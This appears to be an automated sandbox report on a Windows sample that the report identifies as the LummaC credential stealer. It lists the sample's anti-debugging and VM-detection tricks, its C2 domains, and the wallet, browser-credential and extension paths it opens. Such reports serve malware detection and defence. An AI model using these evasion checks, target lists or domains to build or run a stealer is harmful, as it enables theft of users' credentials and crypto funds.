                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: 5120D12 second address: 5120D45 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A2C619163h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 call 00007F2A9CF4DF9Fh 0x0000000e push 75A52B70h 0x00000013 push dword ptr fs:[00000000h] 0x0000001a mov eax, dword ptr [esp+10h] 0x0000001e mov dword ptr [esp+10h], ebp 0x00000022 lea ebp, dword ptr [esp+10h] 0x00000026 sub esp, eax 0x00000028 push ebx 0x00000029 push esi 0x0000002a push edi 0x0000002b mov eax, dword ptr [75AB4538h] 0x00000030 xor dword ptr [ebp-04h], eax 0x00000033 xor eax, ebp 0x00000035 push eax 0x00000036 mov dword ptr [ebp-18h], esp 0x00000039 push dword ptr [ebp-08h] 0x0000003c mov eax, dword ptr [ebp-04h] 0x0000003f mov dword ptr [ebp-04h], FFFFFFFEh 0x00000046 mov dword ptr [ebp-08h], eax 0x00000049 lea eax, dword ptr [ebp-10h] 0x0000004c mov dword ptr fs:[00000000h], eax 0x00000052 ret 0x00000053 push eax 0x00000054 push edx 0x00000055 jmp 00007F2A2C619165h 0x0000005a rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: 5130932 second address: 5130936 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: 5130936 second address: 513093C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: 513093C second address: 5130942 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: 5130942 second address: 5130946 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: 5130946 second address: 513094A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: 513094A second address: 5130970 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F2A2C61915Dh 0x0000000e xchg eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F2A2C61915Dh 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: 5130970 second address: 51309D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, 7DE2h 0x00000007 pushfd 0x00000008 jmp 00007F2A2CEBE363h 0x0000000d add cx, E6DEh 0x00000012 jmp 00007F2A2CEBE369h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b mov ebp, esp 0x0000001d jmp 00007F2A2CEBE35Eh 0x00000022 xchg eax, esi 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F2A2CEBE367h 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: 51309D7 second address: 51309DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: 51309DD second address: 51309E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: 51309E1 second address: 51309F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F2A2C61915Dh 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: 51309F9 second address: 5130A1E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A2CEBE361h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F2A2CEBE35Dh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: 5130A1E second address: 5130A24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: 5130A24 second address: 5130AB1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A2CEBE363h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov esi, dword ptr [ebp+0Ch] 0x0000000e pushad 0x0000000f movzx eax, di 0x00000012 pushfd 0x00000013 jmp 00007F2A2CEBE361h 0x00000018 xor ecx, 5033AA96h 0x0000001e jmp 00007F2A2CEBE361h 0x00000023 popfd 0x00000024 popad 0x00000025 test esi, esi 0x00000027 jmp 00007F2A2CEBE35Eh 0x0000002c je 00007F2A9D7DBC8Eh 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 pushfd 0x00000036 jmp 00007F2A2CEBE35Dh 0x0000003b sbb ax, 7EA6h 0x00000040 jmp 00007F2A2CEBE361h 0x00000045 popfd 0x00000046 mov bx, ax 0x00000049 popad 0x0000004a rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: 5130B41 second address: 5130B47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: 5130B88 second address: 5130BB5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A2CEBE369h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F2A2CEBE35Dh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: 5130BB5 second address: 5130BBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: 5130BBB second address: 5130BBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: 5130BBF second address: 5130BC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeSpecial instruction interceptor: First address: DBED18 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeSpecial instruction interceptor: First address: DC57E4 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeSpecial instruction interceptor: First address: E47644 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe TID: 7476Thread sleep time: -52026s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe TID: 7588Thread sleep time: -210000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe TID: 7448Thread sleep time: -38019s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exe TID: 7588Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: pPizCGDvrx.exe, 00000000.00000002.1755665488.0000000000D9D000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: pPizCGDvrx.exe, 00000000.00000003.1483988517.0000000005AAB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
                Source: pPizCGDvrx.exe, 00000000.00000003.1483988517.0000000005AAB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
                Source: pPizCGDvrx.exe, 00000000.00000003.1483988517.0000000005AAB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
                Source: pPizCGDvrx.exe, 00000000.00000003.1483988517.0000000005AAB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
                Source: pPizCGDvrx.exe, 00000000.00000003.1483988517.0000000005AAB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
                Source: pPizCGDvrx.exe, 00000000.00000003.1483988517.0000000005AAB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696492231s
                Source: pPizCGDvrx.exe, 00000000.00000003.1483988517.0000000005AAB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
                Source: pPizCGDvrx.exe, 00000000.00000003.1483988517.0000000005AAB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696492231
                Source: pPizCGDvrx.exe, 00000000.00000003.1483988517.0000000005AAB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696492231
                Source: pPizCGDvrx.exe, 00000000.00000003.1483988517.0000000005AAB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
                Source: pPizCGDvrx.exe, pPizCGDvrx.exe, 00000000.00000003.1437780478.000000000115A000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000002.1756296489.0000000001158000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1754892767.0000000001158000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1657962576.0000000001158000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1755223714.0000000001158000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1603193401.000000000115A000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000002.1756183164.0000000001129000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1754892767.0000000001127000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1437659594.0000000001158000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1603110801.0000000001158000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: pPizCGDvrx.exe, 00000000.00000003.1483988517.0000000005AAB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
                Source: pPizCGDvrx.exe, 00000000.00000003.1483988517.0000000005AAB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
                Source: pPizCGDvrx.exe, 00000000.00000003.1483988517.0000000005AAB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
                Source: pPizCGDvrx.exe, 00000000.00000003.1483988517.0000000005AAB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696492231t
                Source: pPizCGDvrx.exe, 00000000.00000003.1483744618.0000000005AB8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696492231p
                Source: pPizCGDvrx.exe, 00000000.00000003.1483988517.0000000005AAB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
                Source: pPizCGDvrx.exe, 00000000.00000003.1483988517.0000000005AAB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696492231f
                Source: pPizCGDvrx.exe, 00000000.00000003.1483988517.0000000005AAB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696492231
                Source: pPizCGDvrx.exe, 00000000.00000003.1483988517.0000000005AAB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696492231j
                Source: pPizCGDvrx.exe, 00000000.00000003.1483988517.0000000005AAB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
                Source: pPizCGDvrx.exe, 00000000.00000003.1483988517.0000000005AAB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
                Source: pPizCGDvrx.exe, 00000000.00000003.1483988517.0000000005AAB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696492231x
                Source: pPizCGDvrx.exe, 00000000.00000003.1483988517.0000000005AAB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
                Source: pPizCGDvrx.exe, 00000000.00000003.1483988517.0000000005AAB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696492231o
                Source: pPizCGDvrx.exe, 00000000.00000003.1483988517.0000000005AAB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
                Source: pPizCGDvrx.exe, 00000000.00000003.1483988517.0000000005AAB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
                Source: pPizCGDvrx.exe, 00000000.00000003.1483988517.0000000005AAB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
                Source: pPizCGDvrx.exe, 00000000.00000003.1483988517.0000000005AAB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696492231
                Source: pPizCGDvrx.exe, 00000000.00000002.1755665488.0000000000D9D000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: pPizCGDvrx.exe, 00000000.00000003.1483988517.0000000005AAB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696492231t
                Source: pPizCGDvrx.exe, 00000000.00000003.1483988517.0000000005AAB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
                Source: pPizCGDvrx.exe, 00000000.00000003.1483988517.0000000005AAB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
                Source: pPizCGDvrx.exe, 00000000.00000003.1483988517.0000000005AAB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile opened: SICE
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeProcess queried: DebugPortJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                LummaC encrypted strings found
                Source: pPizCGDvrx.exe, 00000000.00000003.1312659093.0000000004F80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: rapeflowwj.lat
                Source: pPizCGDvrx.exe, 00000000.00000003.1312659093.0000000004F80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: crosshuaht.lat
                Source: pPizCGDvrx.exe, 00000000.00000003.1312659093.0000000004F80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: sustainskelet.lat
                Source: pPizCGDvrx.exe, 00000000.00000003.1312659093.0000000004F80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: aspecteirs.lat
                Source: pPizCGDvrx.exe, 00000000.00000003.1312659093.0000000004F80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: energyaffai.lat
                Source: pPizCGDvrx.exe, 00000000.00000003.1312659093.0000000004F80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: necklacebudi.lat
                Source: pPizCGDvrx.exe, 00000000.00000003.1312659093.0000000004F80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: discokeyus.lat
                Source: pPizCGDvrx.exe, 00000000.00000003.1312659093.0000000004F80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: grannyejh.lat
                Source: pPizCGDvrx.exe, 00000000.00000003.1312659093.0000000004F80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: sweepyribs.lat
                Source: pPizCGDvrx.exe, 00000000.00000002.1755665488.0000000000D9D000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: ~vProgram Manager
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: pPizCGDvrx.exe, 00000000.00000003.1671204983.00000000011ED000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: iles%\Windows Defender\MsMpeng.exe
                Source: pPizCGDvrx.exe, pPizCGDvrx.exe, 00000000.00000002.1756573900.00000000011B3000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000002.1756296489.0000000001158000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1755109523.00000000011B1000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1657908110.00000000011B1000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1754892767.0000000001158000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1657962576.0000000001158000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1755223714.0000000001158000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                barindex
                Yara detected LummaC Stealer
                Source: Yara matchFile source: Process Memory Space: pPizCGDvrx.exe PID: 7392, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                Found many strings related to Crypto-Wallets (likely being stolen)
                Source: pPizCGDvrx.exeString found in binary or memory: Wallets/Electrum
                Source: pPizCGDvrx.exeString found in binary or memory: \??\C:\Users\user\AppData\Roaming\ElectronCash\wallets
                Source: pPizCGDvrx.exeString found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
                Source: pPizCGDvrx.exeString found in binary or memory: window-state.json
                Source: pPizCGDvrx.exeString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                Source: pPizCGDvrx.exeString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                Source: pPizCGDvrx.exeString found in binary or memory: Wallets/Ethereum
                Source: pPizCGDvrx.exeString found in binary or memory: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                Source: pPizCGDvrx.exeString found in binary or memory: keystore
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\formhistory.sqliteJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\prefs.jsJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
